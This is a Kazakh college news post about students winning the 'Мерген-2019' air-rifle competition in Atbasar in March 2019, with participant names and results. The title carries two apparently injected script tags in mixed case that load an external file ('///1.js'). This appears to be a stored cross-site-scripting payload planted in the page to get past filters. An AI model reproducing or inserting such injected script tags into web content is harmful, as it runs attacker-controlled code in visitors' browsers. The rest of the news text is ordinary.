«Мерген-2019»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.03.2019

         2019 жылдың 18-21 наурызы аралығында Ақмола облысы, Атбасар қаласында «Жігер» спартакиадасы аясындағы «Мерген-2019» пневматикалық винтовкадан ату бойынша кәсіптік және техникалық білім беру мекемелері арасында жарыс өткізілді.

         Аталған жарысқа колледждің «Жас мерген» әскери-спорттық үйірмесінің мүшелері қатысты.

         Атап айтсақ:

  • Қабия Айдын – ДМ-21 тобы
  • Маркин Ростислав – ДМ-11 тобы
  • Хамархан Жетпис – ДМ-11 тобы
  • Баймуратова Асем – А-22 тобы
  • Кошманова Мадина – А-31 тобы

Үш күнге созылған жарыс өз мәресіне жетті. Қатысушылар өзара бақ сынасып, байрақты бәсеке өз жеңімпаздарын анықтады. Жалпы, жарыс қорытындысы бойынша: Хамархан Жетпис ВП-1 сайысы бойынша жекелей есеп нәтижесінде – 1-орын, Маркин Ростислав ВП-4 сайысы бойынша – 1-орынды иеленді. Жалпы командалық есепте колледж командасы – 1-орынмен марапатталды. Бағы мен бабы қатар шауып жеңіс тұғырынан көрінген жеңімпаз команда кубок және пневматикалық винтовкадан ату үшін 3 қорап оқ иеленді.

  •  
Просмотров: 649


Пікір қосу



Деректерді қолтаңбаға қосу